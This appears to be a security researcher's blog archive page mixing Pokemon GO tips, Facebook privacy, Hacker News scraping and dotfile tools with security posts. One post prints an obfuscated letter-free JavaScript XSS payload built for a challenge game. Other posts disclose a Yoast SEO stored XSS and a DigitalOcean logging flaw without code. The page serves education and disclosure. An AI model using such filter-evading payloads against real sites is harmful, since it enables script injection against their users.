All posts by c

21 Tips and Resources for The Obsessed Pokemon GO Player

I’ve become somewhat obsessed with Pokemon GO since I started playing it, and I’ve been trying to cobble together a mental guide for how to be successful from a hodge-podge of sites, people I’ve met while playing the game, and some of my own experiences. Here’s what I’ve got so far. Items in red are ones I’m less sure of.

Finding Pokemon

  1. The panel at the bottom right tells you what Pokemon are near. 3 feet = far, 2 feet = nearby, 1 foot = close, none = very close
  2. The Pokemon in the panel are arranged by closeness. Watching how they re-arrange as you walk in one direction will tell you if you’re hot or cold. Work together with friends to cover a wider area
  3. Rustling grass patches aren’t necessarily Pokemon. They may be nearby, though
  4. Look for Pokemon GO maps of your city on reddit. You can also use the official Ingress map for a rough guide, but you have to sign up for an account, which I didn’t bother to do.
    1. Bonus! For those lucky enough to live in Austin, here’s a user-created map of the various locations of note
  5. Some Pokemon are easiest to get by hatching eggs. Check out this list of Pokemon with the distance required to hatch their egg to get an idea of what each of your eggs might be
  6. Incense seems to mostly attract common Pokemon, so it’s useful when you’re trying to catch a few to level up
  7. Walking along roadways SEEMS to yield fairly weak results. Try finding parks and other open areas that are high in pedestrian traffic. There also doesn’t seem to be any universal rarity scale – it appears to be dependent on where you are, so look around when you’re far from home!

Once You Find Them

  1. Spinning your pokeball with your finger (swiping to the side) before throwing it makes you throw a curveball, which gives you a 10XP bonus. It MIGHT make your throw more effective too, but I’m not sure about this
  2. Hitting a Pokemon in the colored circle, when the circle is small, gives you the best chance to capture it. Hit it outside the colored circle, or when the circle is bigger, and it’ll be harder
  3. Waiting to evolve your Pokemon until you’re a higher level will improve the boost in CP your Pokemon gets

Getting Items

  1. Poke Stops regenerate after a few minutes. If you find a comfortable spot, hit one a few times. If you’re surrounded by them, walk in a circuit so that the first one is recharged by the time you return to it
  2. Controlling a gym for 21 hours gives you a small number of Poke-coins that you can spend in the store. Work with teammates to help lock down gyms

Battling Other Players

  1. To train your Pokemon, go to a gym owned by your team and tap the boxing glove icon to train against the Pokemon at that gym
  2. Leaving a Pokemon at a friendly-controlled gym will help strengthen it against rival teams, since rivals will have to defeat your Pokemon before taking on the gym’s master
  3. Here’s Niantic’s guide for attacking a rival-controlled gym, and using attacks in general

Battling the App

  1. Carry around a battery pack for your phone. Seriously.
  2. Turn on the “battery saver” and turn your phone upside down. It will dim the screen, vibrating when there is a Pokemon nearby
  3. Disabling the AR feature saves some battery, and sanity (you won’t have to turn around constantly trying to find your Pokemon)
  4. If you want to get really hardcore, you could buy a Pokemon GO wearable for ~$200 on eBay so you don’t have to stare at your phone constantly (they supposedly ship in late July). Caveat emptor. Pre-orders sold out, but Nintendo will probably offer them for sale again in the near future given the game’s popularity
  5. Be aware that, on iOS at the moment, you’ll be giving up full access to your Google account if you log in with it. Niantic says they’re working on a fix, but in the meantime, maybe try creating a Trainer account instead
  6. All those people you see huddled around popular Poke stops, pacing around while staring at their phones? Go talk to them – they probably know something that you and I don’t!

Good luck out there!

Where do those “Recommended Friends” come from?

Have you ever logged onto Facebook to find “Recommended Friends” that you didn’t expect to see? Maybe someone you briefly met on Tinder, or a co-worker you hate? I think many people are unaware that, by default, the Facebook app on mobile devices automatically imports your contact list, continuously (this includes, so far as I can tell, every piece of information about them that you have stored).

I started noticing this a long time ago, but I sense that there are many who just assume Facebook is omniscient and don’t give it another thought. There are many reasons you may not want to give up this power, and so far as I can tell, the only way to stop importing this information is to delete the Facebook app from your phone. If anyone is aware of a specific privacy setting one can use to disable this behavior, leave a comment on this post!

If you’ve already unwittingly imported your contacts (you can see them here) and want to remove them, click here.

Analyzing ~425 days of Hacker News posts with standard shell commands

(About) 425 days ago (at the time of this writing) I started scraping Hacker News via its shiny new API. And then I promptly forgot about it. That is, until I noticed my cronjob had been throwing errors constantly for a few weeks:

Traceback (most recent call last):
  File "/home/dummy/projects/hn-cron/hn.py", line 62, in <module>
    main()
  File "/home/dummy/projects/hn-cron/hn.py", line 53, in main
    log_line = str(details['id']) + "\t" + details['title'] + "\t" + details['url'] + "\t" + str(details['score']) + "\n"
KeyError: 'url'

Instead of fixing anything, I just commented out the cronjob. But now I feel somewhat obligated to do at least a rudimentary analysis of this data. In keeping with my extreme negligence/laziness throughout this project, I hacked together a few bash commands to do just that.

A few notes about this data, and the (in)accuracy thereof:

  1. The script ran once every 40 minutes, collecting the 30 most popular stories (i.e. those on the front page), and adding them to the list if they were new
  2. I only know I started roughly 425 days ago because the first link in log.txt was this one right here (Who needs timestamps? I have IDs!)
  3. A not-insignificant percent (probably ~10%) of the time, the script would fail because the stupid(, stupid, stupid) Python 2 script I banged out in 10 minutes didn’t know how to handle Unicode characters properly (oops).
  4. I saved everything to a flat file with tab delineation. I probably should’ve used something else, but I didn’t, so here we are.
  5. I only saved the score from the first time a story was found, so theoretically any given post only had an arbitrary 40 minute window to accumulate points, at most. This is probably not strictly true for a number of reasons, but I’m going to pretend it is.
  6. These bash commands grew organically (often with much help from StackOverflow), so they made sense to me at the time, but YMMV
  7. The data is probably inaccurate in a million small ways, but overall, it’s at least worth poking at.

Okay, let’s get down to it!

Continue reading

Constructing an XSS vector, using no letters

At the risk of spoiling a somewhat-well-known XSS game, I want to share an XSS vector I had never thought of before it forced me to. The premise of this level was, essentially, that you couldn’t use any letters whatsoever in the attack vector, and you had to call alert(1).

So, without further ado, here it is:

""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")()

What a mess, right?! What the hell are we doing here? Let’s take it piece-by-piece.

Continue reading

dot-man

I recently hacked together a little 300-line bash script to manage my dotfiles called dot-man. Basically, it will let you manage your dotfiles in a git repository, and you can run it every so often to keep your local / remote dotfiles up to date.

Install is as simple as:

git clone git@github.com:cneill/dot-man.git
OR
git clone https://github.com/cneill/dot-man.git

Let me know what you think! You can find me on Twitter @ccneill.

A tale of lost entropy

Recently, while looking at a JavaScript function intended to generate a cryptographically-secure random IV to be used in AES-GCM, I noticed something interesting which I immediately suspected was not unique to this project. Sure enough, Matt, my awesome colleague, sent me a link to a how-to article describing the process of generating random values in Node.js that included the exact same quirk.

Here is their example (with minor edits so as not to call out the author of that how-to post too explicitly):

Do you notice anything fishy?

Continue reading

Yoast SEO Plugin Authenticated, Stored XSS Vulnerability

The “snippet preview” functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2 (<= 2.1.1). This vulnerability appears to have been reported 2 years ago by someone named “badconker”, but the plugin author said that it was already patched. Unfortunately, it appears that this is not the case. If you are running this plugin, I recommend updating to the latest version.

Yoast WordPress SEO XSS in action

Yoast WordPress SEO XSS in action

Continue reading

DefectDojo

Announcing DefectDojo v1.0.2!

I’m happy to announce the latest version of a project that the Security Engineering team at Rackspace has been working on: DefectDojo! DefectDojo is an open source defect tracking system that was created by our team to keep up with security engagements, but it can be useful for tracking any type of application testing. It supports functionality like Finding templates, PDF report generation, metrics graphs, charts, and some self-service tools for doing port scans, for example.

Checking out DefectDojo

A view of the DefectDojo dashboard

A view of the DefectDojo dashboard

To get the latest version, you can download a zip file or view the source on Github. Want to check out a demo before installing it on your machine? We have you covered.

Login as admin:

Login as product owner / non-staff user:

Continue reading

Evading security logging when logging into DigitalOcean (Fixed)

I noticed a while back that when I carelessly entered my login credentials to the form for registering a new user account on the front page of the DigitalOcean site, it would still log me in. Neato.

However, I was slightly less amused when I noticed that the login event didn’t show an IP address in my security history.

Security history page with IP address conspicuously missing

User.login event with IP address conspicuously missing

I reported this at the time the screenshot was taken several months ago. It appears they have recently fixed the issue.

Just a reminder that not all vulnerabilities are obvious, and you can’t find them all with BURP.